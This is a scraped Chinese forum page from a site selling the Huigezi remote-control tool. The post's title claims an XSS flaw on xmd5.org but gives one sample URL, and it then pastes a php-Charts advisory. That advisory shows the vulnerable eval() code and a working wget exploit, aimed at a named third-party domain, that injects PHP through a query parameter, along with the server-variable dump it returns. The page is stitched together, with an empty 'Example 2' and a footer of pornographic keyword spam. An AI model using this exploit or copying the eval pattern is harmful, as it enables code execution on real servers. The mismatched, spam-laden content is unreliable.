灰鴿子遠程控制軟件

用戶名  找回密碼
 立即注冊

QQ登錄

只需一步,快速開始

查看: 10254|回復: 0
打印 上一主題 下一主題

Xmd5(xmd5.org)Xss存在跨站漏洞可能會被入侵

[復制鏈接]
跳轉到指定樓層
樓主
發表于 2013-1-20 16:45:54 | 只看該作者 |只看大圖 回帖獎勵 |倒序瀏覽 |閱讀模式
Xmd5(xmd5.org)Xss存在跨站漏洞可能會被入侵
我們在info=后面隨便輸入一些字符
  http://www.xmd5.org/md5/getpasssu.asp?info=h3art



php-Charts 任意PHP代碼執行缺陷及修復
影響程序: php-chart_v1.0
程序官方: http://php-charts.com/
缺陷類型: PHP Code Execution.
===============================================================
測試平臺系統: Debian squeeze 6.0.6
服務器軟件版本: Apache/2.2.16 (Debian)
PHP 5.3.3-7+squeeze14 with Suhosin-Patch (cli) (built: Aug  6 2012 20:08:59)
Copyright (c) 1997-2009 The PHP Group
Zend Engine v2.3.0, Copyright (c) 1998-2010 Zend Technologies
with Suhosin v0.9.32.1, Copyright (c) 2007-2010, by SektionEins GmbH
  
================================================================
關于程序介紹:
Php-Charts is basically a class which can be used to generate
different charts(Bar, Pie, Doughnut etc.) in different format(PDF, PNG, JPG, HTML)
using different data source(csv, xml, MySQL, MS Sql, MS Access, PostgreSql,
user defined data).
================================================================
缺陷分析
root@debian:/etc/apache2/htdocs/hacker1/wp/chart/chart/wizard# cat url.php
<?php
         require("../lib/phpchart.class.php");
         $color_var=array("txt_col","line_col","bg_color");
         $cname=$_GET["type"];
         $chart=new PHPChart($cname);
  
         foreach($_GET as $key=>$value)
         {
                 if($value!="")
                 {
                         if(in_array($key,$color_var))
                         eval('$chart->'.$key.'="#'.$value.'";');
                         else if($value=='yes')
                         eval('$chart->'.$key.'=true;');
                         else if($value=='no')
                         eval('$chart->'.$key.'=false;');
                         else if(is_numeric($value))
                         eval('$chart->'.$key.'='.$value.';');
                         else
                         eval('$chart->'.$key."='".$value."';");
                 }
         }
         $chart->genChart();
  
  
  
  
利用:
  
root@debian:/tmp# wget 'http:// www.dumiaotech.com //wp/chart/chart/wizard/url.php?${var_dump($_SERVER)}=IZABEKAILOVEYOUBABY' -O out.txt && cat out.txt
--2013-01-15 21:19:16--  http://www.dumiaotech.com//wp/chart/chart/wizard/url.php?$%7Bvar_dump($_SERVER)%7D=IZABEKAILOVEYOUBABY
Resolving hacker1.own... 127.0.0.1
Connecting to hacker1.own|127.0.0.1|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
Saving to: “out.txt”
  
     [ <=>                                                                                        ] 1,917       --.-K/s   in 0s
  
2013-01-15 21:19:17 (8.56 MB/s) - “out.txt” saved [1917]
  
  
Notice: Undefined index: type in /etc/apache2/htdocs/hacker1/wp/chart/chart/wizard/url.php on line 4
array(28) {
   ["DOCUMENT_ROOT"]=>
   string(28) "/etc/apache2/htdocs/hacker1/"
   ["GATEWAY_INTERFACE"]=>
   string(7) "CGI/1.1"
   ["HTTP_ACCEPT"]=>
   string(3) "*/*"
   ["HTTP_CLIENT_IP"]=>
   string(9) "127.0.0.1"
   ["HTTP_HOST"]=>
   string(11) "hacker1.own"
   ["HTTP_USER_AGENT"]=>
   string(21) "Wget/1.12 (linux-gnu)"
   ["HTTP_VIA"]=>
   string(77) "http/1.0 debian[FE800000000000000A0027FFFE077FC6] (ApacheTrafficServer/3.2.0)"
   ["HTTP_X_FORWARDED_FOR"]=>
   string(9) "127.0.0.1"
   ["PATH"]=>
   string(4) "/bin"
   ["PHPRC"]=>
   string(14) "/etc/php5/cgi/"
   ["QUERY_STRING"]=>
   string(45) "$%7Bvar_dump($_SERVER)%7D=IZABEKAILOVEYOUBABY"
   ["REDIRECT_STATUS"]=>
   string(3) "200"
   ["REMOTE_ADDR"]=>
   string(9) "127.0.0.1"
   ["REMOTE_PORT"]=>
   string(5) "60830"
   ["REQUEST_METHOD"]=>
   string(3) "GET"
   ["REQUEST_URI"]=>
   string(76) "/wp/chart/chart/wizard/url.php?$%7Bvar_dump($_SERVER)%7D=IZABEKAILOVEYOUBABY"
   ["SCRIPT_FILENAME"]=>
   string(57) "/etc/apache2/htdocs/hacker1/wp/chart/chart/wizard/url.php"
   ["SCRIPT_NAME"]=>
   string(30) "/wp/chart/chart/wizard/url.php"
   ["SERVER_ADDR"]=>
   string(9) "127.0.0.1"
   ["SERVER_ADMIN"]=>
   string(21) "webmaster@hacker1.own"
   ["SERVER_NAME"]=>
   string(11) "hacker1.own"
   ["SERVER_PORT"]=>
   string(2) "80"
   ["SERVER_PROTOCOL"]=>
   string(8) "HTTP/1.1"
   ["SERVER_SIGNATURE"]=>
   string(0) ""
   ["SERVER_SOFTWARE"]=>
   string(6) "Apache"
   ["UNIQUE_ID"]=>
   string(24) "UPYOJH8AAQEAAE8eNfMAAAAC"
   ["PHP_SELF"]=>
   string(30) "/wp/chart/chart/wizard/url.php"
   ["REQUEST_TIME"]=>
   int(1358302756)
}
  
Notice: Undefined variable:  in /etc/apache2/htdocs/hacker1/wp/chart/chart/wizard/url.php(20) : eval()'d code on line 1
  
Fatal error: Cannot access empty property in /etc/apache2/htdocs/hacker1/wp/chart/chart/wizard/url.php(20) : eval()'d code on line 1
root@debian:/tmp#
  灰鴿子,灰鴿子使用教程,灰鴿子下載,灰鴿子購買,灰鴿子遠程控制軟件
  
Example 2:
  
灰鴿子,灰鴿子使用教程,灰鴿子下載,灰鴿子購買,灰鴿子遠程控制軟件
評帖賺銀幣(0) 收起
分享到:  QQ好友和群QQ好友和群
收藏收藏
回復

舉報

您需要登錄后才可以回帖 登錄 | 立即注冊

本版積分規則

Archiver|手機版|小黑屋|灰鴿子遠程控制軟件|灰鴿子遠程控制軟件 ( 魯ICP備14000061號-4 )

GMT+8, 2025-3-13 14:28 , Processed in 0.204711 second(s), 25 queries , Gzip On.

Powered by Discuz! X3.4

Copyright © 2001-2021, Tencent Cloud.

快速回復 返回頂部 返回列表
主站蜘蛛池模板: 久久ZYZ资源站无码中文动漫| 久久久久亚洲AV无码专区桃色| 熟妇人妻系列aⅴ无码专区友真希| 国产无码网页在线观看| 国产V亚洲V天堂无码久久久| 国产午夜av无码无片久久96| 中文字幕丰满乱子伦无码专区| 亚洲国产精品无码久久久秋霞1| 无码不卡中文字幕av| 午夜无码国产理论在线| 真人无码作爱免费视频| 亚洲国产成人无码AV在线影院 | 久久久久亚洲AV无码专区网站| 亚洲爆乳无码专区| 亚洲无码视频在线| (无码视频)在线观看 | 激情无码人妻又粗又大中国人| 无码AV动漫精品一区二区免费| 亚洲中文无码永久免| 国产成人精品无码片区在线观看| julia无码人妻中文字幕在线| 无码国产激情在线观看| 久久精品无码一区二区无码| 亚洲国产精品成人精品无码区| 中文无码日韩欧免费视频| 国产AV天堂无码一区二区三区| 亚洲av无码专区在线观看下载| 人妻中文字系列无码专区| 少妇人妻无码精品视频app| 亚洲日韩乱码中文无码蜜桃臀网站 | 日韩人妻无码精品久久久不卡| 国产激情无码一区二区| 中文字幕无码日韩专区| 亚洲一区二区三区AV无码| 亚洲中文字幕无码中文字在线| 狠狠噜天天噜日日噜无码| 中文字幕丰满伦子无码| 无码国内精品人妻少妇蜜桃视频| 国产免费无码AV片在线观看不卡| 久久亚洲精品无码| 亚洲av无码片在线观看|